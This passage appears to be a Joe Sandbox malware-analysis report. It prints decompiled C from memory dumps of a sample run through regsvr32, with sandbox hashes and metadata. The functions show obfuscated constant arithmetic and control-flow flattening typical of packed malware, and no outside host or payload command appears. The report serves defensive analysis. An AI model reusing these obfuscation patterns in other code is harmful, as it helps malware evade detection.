                                                                                                                				signed int _t284;
                                                                                                                				signed int _t285;
                                                                                                                				signed int _t286;
                                                                                                                				signed int _t287;
                                                                                                                				signed int _t288;
                                                                                                                				signed int _t289;
                                                                                                                				signed int _t290;
                                                                                                                				signed int _t291;
                                                                                                                				signed int _t292;
                                                                                                                				void* _t293;
                                                                                                                
                                                                                                                				_v104 = _v104 & 0x00000000;
                                                                                                                				_v100 = _v100 & 0x00000000;
                                                                                                                				_t256 = 0xfb401bb;
                                                                                                                				_v112 = 0xb6520e;
                                                                                                                				_v108 = 0x77a7da;
                                                                                                                				_t279 =  *0x1c4c10; // 0x67d820
                                                                                                                				_v48 = 0xca99ef;
                                                                                                                				_t280 = _t279 + 0x20c;
                                                                                                                				_v48 = _v48 | 0xf0ff7fff;
                                                                                                                				_v48 = _v48 ^ 0xf0f3d62d;
                                                                                                                				_v76 = 0xc110de;
                                                                                                                				_t284 = 0x36;
                                                                                                                				_v76 = _v76 * 0x5b;
                                                                                                                				_v76 = _v76 ^ 0x44aa4678;
                                                                                                                				_v72 = 0x558166;
                                                                                                                				_v72 = _v72 / _t284;
                                                                                                                				_v72 = _v72 ^ 0x0000e0a5;
                                                                                                                				_v52 = 0x5b7f54;
                                                                                                                				_v52 = _v52 + 0x1f1f;
                                                                                                                				_v52 = _v52 ^ 0xa5ab1809;
                                                                                                                				_v52 = _v52 ^ 0xa5f131a6;
                                                                                                                				_v12 = 0xff5e7d;
                                                                                                                				_t285 = 0x4e;
                                                                                                                				_v12 = _v12 * 0x6a;
                                                                                                                				_v12 = _v12 >> 0xa;
                                                                                                                				_v12 = _v12 + 0xffff4958;
                                                                                                                				_v12 = _v12 ^ 0x001194e7;
                                                                                                                				_v60 = 0x2907de;
                                                                                                                				_v60 = _v60 ^ 0xd1668794;
                                                                                                                				_v60 = _v60 * 0x44;
                                                                                                                				_v60 = _v60 ^ 0x9914720f;
                                                                                                                				_v8 = 0x89eaa7;
                                                                                                                				_v8 = _v8 | 0x7fdf7905;
                                                                                                                				_v8 = _v8 ^ 0x247f3cb2;
                                                                                                                				_v8 = _v8 ^ 0x5baeb6bd;
                                                                                                                				_v56 = 0xb228b6;
                                                                                                                				_v56 = _v56 >> 7;
                                                                                                                				_v56 = _v56 << 2;
                                                                                                                				_v56 = _v56 ^ 0x00094367;
                                                                                                                				_v84 = 0x30b30b;
                                                                                                                				_v84 = _v84 << 0xf;
                                                                                                                				_v84 = _v84 ^ 0x59856f3b;
                                                                                                                				_v80 = 0xda8340;
                                                                                                                				_v80 = _v80 >> 3;
                                                                                                                				_v80 = _v80 ^ 0x00131eed;
                                                                                                                				_v16 = 0x964de4;
                                                                                                                				_v16 = _v16 >> 0xb;
                                                                                                                				_v16 = _v16 << 0xb;
                                                                                                                				_v16 = _v16 << 0xf;
                                                                                                                				_v16 = _v16 ^ 0x2400dd8a;
                                                                                                                				_v64 = 0xb43aa1;
                                                                                                                				_v64 = _v64 / _t285;
                                                                                                                				_t286 = 0x32;
                                                                                                                				_v64 = _v64 / _t286;
                                                                                                                				_v64 = _v64 ^ 0x0009ca74;
                                                                                                                				_v28 = 0x6a8;
                                                                                                                				_v28 = _v28 | 0xafd2b135;
                                                                                                                				_t287 = 0x5b;
                                                                                                                				_v28 = _v28 / _t287;
                                                                                                                				_v28 = _v28 * 0x79;
                                                                                                                				_v28 = _v28 ^ 0xe9c9c4ae;
                                                                                                                				_v24 = 0x9c0a45;
                                                                                                                				_v24 = _v24 | 0xffef9ffe;
                                                                                                                				_v24 = _v24 ^ 0xfff79bae;
                                                                                                                				_v20 = 0x6ae438;
                                                                                                                				_v20 = _v20 << 0xa;
                                                                                                                				_v20 = _v20 ^ 0xa28aafdf;
                                                                                                                				_v20 = _v20 + 0x4f32;
                                                                                                                				_v20 = _v20 ^ 0x0911bfd6;
                                                                                                                				_v40 = 0xa4caa8;
                                                                                                                				_v40 = _v40 >> 7;
                                                                                                                				_v40 = _v40 + 0xffffde1f;
                                                                                                                				_v40 = _v40 << 0xd;
                                                                                                                				_v40 = _v40 ^ 0x24f3925d;
                                                                                                                				_v88 = 0x6bd929;
                                                                                                                				_v88 = _v88 + 0xffffe4bd;
                                                                                                                				_v88 = _v88 ^ 0x006be19c;
                                                                                                                				_v36 = 0x6fd694;
                                                                                                                				_t288 = 0x56;
                                                                                                                				_v36 = _v36 / _t288;
                                                                                                                				_v36 = _v36 + 0xffff4007;
                                                                                                                				_v36 = _v36 >> 2;
                                                                                                                				_v36 = _v36 ^ 0x0008fb7a;
                                                                                                                				_v32 = 0x3d45c7;
                                                                                                                				_v32 = _v32 | 0x8d66135e;
                                                                                                                				_v32 = _v32 << 7;
                                                                                                                				_v32 = _v32 + 0xffffa23e;
                                                                                                                				_v32 = _v32 ^ 0xbfa8b5be;
                                                                                                                				_v44 = 0x3fd938;
                                                                                                                				_v44 = _v44 >> 7;
                                                                                                                				_t289 = 0x27;
                                                                                                                				_v44 = _v44 / _t289;
                                                                                                                				_v44 = _v44 + 0x119f;
                                                                                                                				_v44 = _v44 ^ 0x00099788;
                                                                                                                				_v68 = 0x1d5749;
                                                                                                                				_v68 = _v68 >> 1;
                                                                                                                				_v68 = _v68 + 0x8428;
                                                                                                                				_v68 = _v68 ^ 0x000ea71d;
                                                                                                                				_v96 = 0x2444b6;
                                                                                                                				_t290 = 0x5e;
                                                                                                                				_v96 = _v96 / _t290;
                                                                                                                				_v96 = _v96 ^ 0x000108a9;
                                                                                                                				_v92 = 0x7d170d;
                                                                                                                				_v92 = _v92 + 0xdcaa;
                                                                                                                				_v92 = _v92 ^ 0x007c0762;
                                                                                                                				do {
                                                                                                                					while(_t256 != 0x2c64ce1) {
                                                                                                                						if(_t256 == 0x4461948) {
                                                                                                                							E001A8744(_v44, _v68, 1, _v96, 3, _t280, _v92);
                                                                                                                							 *((short*)(_t280 + 6)) = 0;
                                                                                                                							return 0;
                                                                                                                						}
                                                                                                                						if(_t256 == 0x9842e60) {
                                                                                                                							_push(0x10);
                                                                                                                							_t292 = E001B96D4(_t256, 4);
                                                                                                                							E001A8744(_v12, _v60, 2, _v8, 1, _t280, _v56);
                                                                                                                							_t282 = _t280 + 2;
                                                                                                                							E001A8744(_v84, _v80, 1, _v16, _t292, _t282, _v64);
                                                                                                                							_t293 = _t293 + 0x34;
                                                                                                                							_t283 = _t282 + _t292 * 2;
                                                                                                                							_t256 = 0x2c64ce1;
                                                                                                                							_t254 = 0x5c;
                                                                                                                							 *_t283 = _t254;
                                                                                                                							_t280 = _t283 + 2;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						if(_t256 != 0xfb401bb) {
                                                                                                                							goto L8;
                                                                                                                						}
                                                                                                                						_t254 = E001ACCA2();
                                                                                                                						_t256 = 0x9842e60;
                                                                                                                					}
                                                                                                                					_push(0x10);
                                                                                                                					_t291 = E001B96D4(_t256, 4);
                                                                                                                					E001A8744(_v40, _v88, 1, _v36, _t291, _t280, _v32);
                                                                                                                					_t293 = _t293 + 0x20;
                                                                                                                					_t281 = _t280 + _t291 * 2;
                                                                                                                					_t256 = 0x4461948;
                                                                                                                					_t245 = 0x2e;
                                                                                                                					 *_t281 = _t245;
                                                                                                                					_t280 = _t281 + 2;
                                                                                                                					L8:
                                                                                                                				} while (_t256 != 0x9891b4d);
                                                                                                                				return _t254;
                                                                                                                			}

                                                                                                                0x001b957e
                                                                                                                0x001b958e
                                                                                                                0x001b9596
                                                                                                                0x001b95a6
                                                                                                                0x001b95ab
                                                                                                                0x001b95ae
                                                                                                                0x001b95b1
                                                                                                                0x001b95b8
                                                                                                                0x001b95b9
                                                                                                                0x001b95bc
                                                                                                                0x00000000
                                                                                                                0x001b95bc
                                                                                                                0x001b9553
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001b955c
                                                                                                                0x001b9561
                                                                                                                0x001b9561
                                                                                                                0x001b95cd
                                                                                                                0x001b95da
                                                                                                                0x001b95e9
                                                                                                                0x001b95ee
                                                                                                                0x001b95f1
                                                                                                                0x001b95f4
                                                                                                                0x001b95fb
                                                                                                                0x001b95fc
                                                                                                                0x001b95ff
                                                                                                                0x001b9602
                                                                                                                0x001b9602
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 8j$gC
                                                                                                                • API String ID: 0-1253789705
                                                                                                                • Opcode ID: f714318f783c773a54a82f4ff96256ed7bd0b709d11b6202c285b1239b6a41ad
                                                                                                                • Instruction ID: 2a689eaec373b9d6241fee158275f67f209ea4b8f5bab3b54779701ad37333a5
                                                                                                                • Opcode Fuzzy Hash: f714318f783c773a54a82f4ff96256ed7bd0b709d11b6202c285b1239b6a41ad
                                                                                                                • Instruction Fuzzy Hash: CFB103B5D01319ABDF28CFE5D88A9DEBBB1FB44314F208059E225BA254C7B41A46CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 91%
                                                                                                                			E001A1DCA(void* __ecx) {
                                                                                                                				signed int _v4;
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				unsigned int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				unsigned int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				unsigned int _v48;
                                                                                                                				unsigned int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				unsigned int _v60;
                                                                                                                				unsigned int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				unsigned int _v76;
                                                                                                                				void* _t205;
                                                                                                                				void* _t209;
                                                                                                                				void* _t213;
                                                                                                                				void* _t214;
                                                                                                                				void* _t218;
                                                                                                                				void* _t224;
                                                                                                                				void* _t225;
                                                                                                                				signed int _t227;
                                                                                                                				signed int _t228;
                                                                                                                				signed int _t229;
                                                                                                                				signed int _t230;
                                                                                                                				signed int _t231;
                                                                                                                				signed int _t232;
                                                                                                                				signed int _t233;
                                                                                                                				void* _t253;
                                                                                                                				void* _t254;
                                                                                                                				unsigned int* _t256;
                                                                                                                				void* _t258;
                                                                                                                
                                                                                                                				_t256 =  &_v76;
                                                                                                                				_v68 = 0x160c5d;
                                                                                                                				_v68 = _v68 + 0xffffdd43;
                                                                                                                				_v68 = _v68 ^ 0xbc482250;
                                                                                                                				_v68 = _v68 + 0xf314;
                                                                                                                				_v68 = _v68 ^ 0xbc5584f4;
                                                                                                                				_v72 = 0xe03e76;
                                                                                                                				_v72 = _v72 | 0x7b474349;
                                                                                                                				_v72 = _v72 ^ 0x63c33ca5;
                                                                                                                				_v72 = _v72 * 0x5c;
                                                                                                                				_t225 = __ecx;
                                                                                                                				_v72 = _v72 ^ 0xad005a31;
                                                                                                                				_t253 = 0;
                                                                                                                				_v60 = 0x6364a1;
                                                                                                                				_t254 = 0xf2b36ca;
                                                                                                                				_v60 = _v60 >> 0xb;
                                                                                                                				_v60 = _v60 << 0xa;
                                                                                                                				_v60 = _v60 >> 0xc;
                                                                                                                				_v60 = _v60 ^ 0x000e28d1;
                                                                                                                				_v8 = 0x9fbbb6;
                                                                                                                				_v8 = _v8 + 0xe1e2;
                                                                                                                				_v8 = _v8 ^ 0x00ab94cf;
                                                                                                                				_v64 = 0xedfd74;
                                                                                                                				_t227 = 0x28;
                                                                                                                				_v64 = _v64 / _t227;
                                                                                                                				_t228 = 0x6f;
                                                                                                                				_v64 = _v64 / _t228;
                                                                                                                				_v64 = _v64 >> 6;
                                                                                                                				_v64 = _v64 ^ 0x000dd42e;
                                                                                                                				_v12 = 0xcfade0;
                                                                                                                				_v12 = _v12 ^ 0xbf231f4c;
                                                                                                                				_v12 = _v12 ^ 0xbfec5367;
                                                                                                                				_v36 = 0x4cc8d1;
                                                                                                                				_t229 = 0x38;
                                                                                                                				_v36 = _v36 * 0x4c;
                                                                                                                				_v36 = _v36 / _t229;
                                                                                                                				_v36 = _v36 ^ 0x006943cf;
                                                                                                                				_v40 = 0xf7c221;
                                                                                                                				_v40 = _v40 + 0x86ca;
                                                                                                                				_v40 = _v40 >> 0xf;
                                                                                                                				_v40 = _v40 ^ 0x000a9be7;
                                                                                                                				_v48 = 0xb28169;
                                                                                                                				_v48 = _v48 << 0x10;
                                                                                                                				_v48 = _v48 >> 0xd;
                                                                                                                				_v48 = _v48 ^ 0x0002e0af;
                                                                                                                				_v20 = 0xbdd737;
                                                                                                                				_v20 = _v20 + 0xffffc64f;
                                                                                                                				_v20 = _v20 ^ 0x00bcc3ac;
                                                                                                                				_v52 = 0xd1ed72;
                                                                                                                				_v52 = _v52 << 6;
                                                                                                                				_v52 = _v52 >> 0xa;
                                                                                                                				_v52 = _v52 ^ 0x0003583d;
                                                                                                                				_v44 = 0x25b560;
                                                                                                                				_t230 = 0x60;
                                                                                                                				_v44 = _v44 * 0x12;
                                                                                                                				_v44 = _v44 / _t230;
                                                                                                                				_v44 = _v44 ^ 0x00008134;
                                                                                                                				_v76 = 0x2945d7;
                                                                                                                				_t231 = 0x27;
                                                                                                                				_v76 = _v76 / _t231;
                                                                                                                				_v76 = _v76 + 0xfffffa2f;
                                                                                                                				_v76 = _v76 >> 1;
                                                                                                                				_v76 = _v76 ^ 0x00039a70;
                                                                                                                				_v16 = 0xa23cac;
                                                                                                                				_v16 = _v16 >> 0xd;
                                                                                                                				_v16 = _v16 ^ 0x00036df9;
                                                                                                                				_v28 = 0x4066fa;
                                                                                                                				_v28 = _v28 ^ 0x386a85c4;
                                                                                                                				_t232 = 0x30;
                                                                                                                				_v28 = _v28 / _t232;
                                                                                                                				_v28 = _v28 ^ 0x0129e620;
                                                                                                                				_v4 = 0x188b00;
                                                                                                                				_v4 = _v4 + 0xfffff624;
                                                                                                                				_v4 = _v4 ^ 0x00185daa;
                                                                                                                				_v32 = 0x74e598;
                                                                                                                				_t233 = 0x79;
                                                                                                                				_v32 = _v32 / _t233;
                                                                                                                				_v32 = _v32 << 0xf;
                                                                                                                				_v32 = _v32 ^ 0x7ba7407d;
                                                                                                                				_v24 = 0x360535;
                                                                                                                				_v24 = _v24 | 0x79da5273;
                                                                                                                				_v24 = _v24 >> 8;
                                                                                                                				_v24 = _v24 ^ 0x0070d1c0;
                                                                                                                				_v56 = 0xfa8463;
                                                                                                                				_v56 = _v56 + 0xfffffe8d;
                                                                                                                				_v56 = _v56 + 0x73f3;
                                                                                                                				_v56 = _v56 ^ 0x186b7fce;
                                                                                                                				_v56 = _v56 ^ 0x1891fcd4;
                                                                                                                				goto L1;
                                                                                                                				do {
                                                                                                                					while(1) {
                                                                                                                						L1:
                                                                                                                						_t258 = _t254 - 0xc6387f2;
                                                                                                                						if(_t258 > 0) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						if(_t258 == 0) {
                                                                                                                							_push(_t233);
                                                                                                                							_push(_t233);
                                                                                                                							_t213 = E001BED77();
                                                                                                                							_t256 =  &(_t256[2]);
                                                                                                                							_t254 = 0xbc8bd24;
                                                                                                                							_t253 = _t253 + _t213;
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							if(_t254 == 0x219bbc9) {
                                                                                                                								_t214 = E001ABF8B(_v68, _t225 + 0x10, _v72);
                                                                                                                								_pop(_t233);
                                                                                                                								_t253 = _t253 + _t214;
                                                                                                                								_t254 = 0xf23c674;
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                								if(_t254 == 0x9875614) {
                                                                                                                									_push(_t233);
                                                                                                                									_push(_t233);
                                                                                                                									_t218 = E001BED77();
                                                                                                                									_t256 =  &(_t256[2]);
                                                                                                                									_t254 = 0xdeb088e;
                                                                                                                									_t253 = _t253 + _t218;
                                                                                                                									continue;
                                                                                                                								} else {
                                                                                                                									if(_t254 == 0xae95bad) {
                                                                                                                										_t253 = _t253 + E001ABF8B(_v24, _t225 + 0x1c, _v56);
                                                                                                                									} else {
                                                                                                                										if(_t254 != 0xbc8bd24) {
                                                                                                                											goto L17;
                                                                                                                										} else {
                                                                                                                											_push(_t233);
                                                                                                                											_push(_t233);
                                                                                                                											_t224 = E001BED77();
                                                                                                                											_t256 =  &(_t256[2]);
                                                                                                                											_t254 = 0x9875614;
                                                                                                                											_t253 = _t253 + _t224;
                                                                                                                											continue;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L20:
                                                                                                                						return _t253;
                                                                                                                					}
                                                                                                                					if(_t254 == 0xdeb088e) {
                                                                                                                						_push(_t233);
                                                                                                                						_push(_t233);
                                                                                                                						_t205 = E001BED77();
                                                                                                                						_t256 =  &(_t256[2]);
                                                                                                                						_t254 = 0xae95bad;
                                                                                                                						_t253 = _t253 + _t205;
                                                                                                                						goto L17;
                                                                                                                					} else {
                                                                                                                						if(_t254 == 0xf23c674) {
                                                                                                                							_push(_t233);
                                                                                                                							_push(_t233);
                                                                                                                							_t209 = E001BED77();
                                                                                                                							_t256 =  &(_t256[2]);
                                                                                                                							_t254 = 0xc6387f2;
                                                                                                                							_t253 = _t253 + _t209;
                                                                                                                							goto L1;
                                                                                                                						} else {
                                                                                                                							if(_t254 != 0xf2b36ca) {
                                                                                                                								goto L17;
                                                                                                                							} else {
                                                                                                                								_t254 = 0x219bbc9;
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					goto L20;
                                                                                                                					L17:
                                                                                                                				} while (_t254 != 0x42fa39a);
                                                                                                                				goto L20;
                                                                                                                			}









































                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 1Z$ICG{
                                                                                                                • API String ID: 0-3858990741
                                                                                                                • Opcode ID: 19d7b763f59c274b39ad01ee0b929f100e2e12b0f30b27bb5447f1327c964cb4
                                                                                                                • Instruction ID: 833390c8559e7fd759ff7766618336521e52177e4cb406671957d0b2c7bfca9d
                                                                                                                • Opcode Fuzzy Hash: 19d7b763f59c274b39ad01ee0b929f100e2e12b0f30b27bb5447f1327c964cb4
                                                                                                                • Instruction Fuzzy Hash: 379166B29093409FC358CF28D98A40BFBE1BBD6758F408A1DF59997260D7B6D909CF02
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 92%
                                                                                                                			E001C05F6(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                				signed int _v4;
                                                                                                                				intOrPtr _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				signed int _v80;
                                                                                                                				void* _t153;
                                                                                                                				signed int _t165;
                                                                                                                				void* _t167;
                                                                                                                				intOrPtr* _t169;
                                                                                                                				void* _t171;
                                                                                                                				void* _t188;
                                                                                                                				signed int _t189;
                                                                                                                				signed int _t190;
                                                                                                                				signed int _t191;
                                                                                                                				signed int _t192;
                                                                                                                				void* _t194;
                                                                                                                				signed int* _t196;
                                                                                                                
                                                                                                                				_push(_a16);
                                                                                                                				_t169 = __edx;
                                                                                                                				_t194 = __ecx;
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t153);
                                                                                                                				_v12 = 0xa85a8d;
                                                                                                                				_t188 = 0;
                                                                                                                				_v4 = _v4 & 0;
                                                                                                                				_t196 =  &(( &_v80)[6]);
                                                                                                                				_v8 = 0x8979c1;
                                                                                                                				_v20 = 0x4aeb00;
                                                                                                                				_t171 = 0x9e12010;
                                                                                                                				_v20 = _v20 ^ 0xf6151ecc;
                                                                                                                				_v20 = _v20 ^ 0xf65ff5ce;
                                                                                                                				_v60 = 0xdae2a;
                                                                                                                				_v60 = _v60 + 0xffff96ee;
                                                                                                                				_v60 = _v60 ^ 0xc16cefcc;
                                                                                                                				_v60 = _v60 ^ 0xc161aac4;
                                                                                                                				_v68 = 0xc4b904;
                                                                                                                				_v68 = _v68 << 0xf;
                                                                                                                				_v68 = _v68 << 0xb;
                                                                                                                				_v68 = _v68 ^ 0x50000000;
                                                                                                                				_v48 = 0x1c7791;
                                                                                                                				_v48 = _v48 + 0xcf7c;
                                                                                                                				_t189 = 0x48;
                                                                                                                				_v48 = _v48 / _t189;
                                                                                                                				_v48 = _v48 ^ 0x00027b2e;
                                                                                                                				_v52 = 0x7c90ac;
                                                                                                                				_v52 = _v52 >> 0xb;
                                                                                                                				_t190 = 3;
                                                                                                                				_v52 = _v52 / _t190;
                                                                                                                				_v52 = _v52 ^ 0x000acdf0;
                                                                                                                				_v56 = 0xf2a3a1;
                                                                                                                				_v56 = _v56 + 0xc92d;
                                                                                                                				_v56 = _v56 + 0xd1bb;
                                                                                                                				_v56 = _v56 ^ 0x00f655dc;
                                                                                                                				_v80 = 0x4c0523;
                                                                                                                				_v80 = _v80 + 0xffffbf0c;
                                                                                                                				_v80 = _v80 ^ 0xf30a28ba;
                                                                                                                				_v80 = _v80 | 0x31c49b93;
                                                                                                                				_v80 = _v80 ^ 0xf3cbca4f;
                                                                                                                				_v64 = 0xfad75c;
                                                                                                                				_v64 = _v64 ^ 0x62962a52;
                                                                                                                				_v64 = _v64 + 0xfe0c;
                                                                                                                				_v64 = _v64 ^ 0x626b4f05;
                                                                                                                				_v24 = 0xc167a5;
                                                                                                                				_t191 = 0x45;
                                                                                                                				_v24 = _v24 * 0x35;
                                                                                                                				_v24 = _v24 ^ 0x28065125;
                                                                                                                				_v28 = 0x5e223;
                                                                                                                				_v28 = _v28 | 0xef64f213;
                                                                                                                				_v28 = _v28 ^ 0xef629db8;
                                                                                                                				_v72 = 0x39d48;
                                                                                                                				_v72 = _v72 + 0xf26c;
                                                                                                                				_v72 = _v72 / _t191;
                                                                                                                				_v72 = _v72 ^ 0x0000de3d;
                                                                                                                				_v32 = 0xaf61bc;
                                                                                                                				_v32 = _v32 | 0x812c8077;
                                                                                                                				_v32 = _v32 ^ 0x81ac983d;
                                                                                                                				_v36 = 0xb1d15a;
                                                                                                                				_v36 = _v36 + 0xffff08fc;
                                                                                                                				_v36 = _v36 ^ 0x00b940a9;
                                                                                                                				_v40 = 0x40f696;
                                                                                                                				_t192 = 0x37;
                                                                                                                				_v40 = _v40 / _t192;
                                                                                                                				_v40 = _v40 ^ 0x0003b294;
                                                                                                                				_v76 = 0xa44738;
                                                                                                                				_v76 = _v76 << 0xf;
                                                                                                                				_v76 = _v76 ^ 0x0bf6f790;
                                                                                                                				_v76 = _v76 * 0x2f;
                                                                                                                				_v76 = _v76 ^ 0x6ba8cd0d;
                                                                                                                				_v16 = 0x7d78eb;
                                                                                                                				_v16 = _v16 << 8;
                                                                                                                				_v16 = _v16 ^ 0x7d7abd51;
                                                                                                                				_t193 = _v16;
                                                                                                                				_v44 = 0x100367;
                                                                                                                				_v44 = _v44 >> 8;
                                                                                                                				_v44 = _v44 << 4;
                                                                                                                				_v44 = _v44 ^ 0x000a0a22;
                                                                                                                				do {
                                                                                                                					while(_t171 != 0x9e12010) {
                                                                                                                						if(_t171 == 0xb3598c5) {
                                                                                                                							_t165 = E001BA50A(_v48, _v20, _v52, _v56, _v60, _v80, _v64, _v68, _t171, _v24, 0, _v28, _t194);
                                                                                                                							_t193 = _t165;
                                                                                                                							_t196 =  &(_t196[0xc]);
                                                                                                                							if(_t165 != 0xffffffff) {
                                                                                                                								_t171 = 0xdca968c;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							if(_t171 == 0xdca968c) {
                                                                                                                								_t167 = E001A7E8A(_t169 + 4, _t193, _v72, _v32, _t169 + 4, _v36,  *_t169, _v40,  *((intOrPtr*)(_t169 + 4)));
                                                                                                                								_t196 =  &(_t196[7]);
                                                                                                                								_t188 = _t167;
                                                                                                                								_t171 = 0xf4cf9fa;
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                								if(_t171 != 0xf4cf9fa) {
                                                                                                                									goto L11;
                                                                                                                								} else {
                                                                                                                									E001B02D8(_t193, _v76, _v16, _v44);
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L6:
                                                                                                                						return _t188;
                                                                                                                					}
                                                                                                                					_t171 = 0xb3598c5;
                                                                                                                					L11:
                                                                                                                				} while (_t171 != 0xa5afb41);
                                                                                                                				goto L6;
                                                                                                                			}




































                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: "$x}
                                                                                                                • API String ID: 0-146941907
                                                                                                                • Opcode ID: a127a5fe5477d2b72d35e0e762179c02e217160014e532ff9ca0c06a32aaf90b
                                                                                                                • Instruction ID: d440c9a83e05d10e131b207213c3027c80394e47b4b21a34644e046764ed6e4d
                                                                                                                • Opcode Fuzzy Hash: a127a5fe5477d2b72d35e0e762179c02e217160014e532ff9ca0c06a32aaf90b
                                                                                                                • Instruction Fuzzy Hash: 61713272409300ABC759CF65C94991BBBF2FBC4B58F509A0DF69156220D3B5C909CF83
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 92%
                                                                                                                			E001B3E89(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a12, intOrPtr _a16) {
                                                                                                                				signed int _v4;
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				void* _t151;
                                                                                                                				void* _t162;
                                                                                                                				void* _t172;
                                                                                                                				void* _t174;
                                                                                                                				signed int _t176;
                                                                                                                				void* _t192;
                                                                                                                				void* _t197;
                                                                                                                				signed int* _t201;
                                                                                                                				signed int* _t202;
                                                                                                                				signed int* _t203;
                                                                                                                
                                                                                                                				_push(_a16);
                                                                                                                				_t199 = _a12;
                                                                                                                				_push(_a12);
                                                                                                                				_push(0);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t151);
                                                                                                                				_v36 = 0xbd5fd1;
                                                                                                                				_v36 = _v36 + 0xd5a5;
                                                                                                                				_t176 = 0x55;
                                                                                                                				_v36 = _v36 * 0x6e;
                                                                                                                				_v36 = _v36 ^ 0x51bae8b4;
                                                                                                                				_v40 = 0x185593;
                                                                                                                				_v40 = _v40 >> 0x10;
                                                                                                                				_v40 = _v40 + 0xffffcfa0;
                                                                                                                				_v40 = _v40 ^ 0xffffefb8;
                                                                                                                				_v32 = 0xdcd1a7;
                                                                                                                				_v32 = _v32 + 0xec0f;
                                                                                                                				_v32 = _v32 + 0xffff95d1;
                                                                                                                				_v32 = _v32 ^ 0x00dd53c7;
                                                                                                                				_v44 = 0xaa718a;
                                                                                                                				_v44 = _v44 >> 0xf;
                                                                                                                				_v44 = _v44 >> 0xe;
                                                                                                                				_v44 = _v44 ^ 0x00083461;
                                                                                                                				_v68 = 0x96d1ce;
                                                                                                                				_v68 = _v68 | 0xfa6bffff;
                                                                                                                				_v68 = _v68 >> 0xd;
                                                                                                                				_v68 = _v68 ^ 0x000d7337;
                                                                                                                				_v16 = 0x5389c;
                                                                                                                				_v16 = _v16 * 0x43;
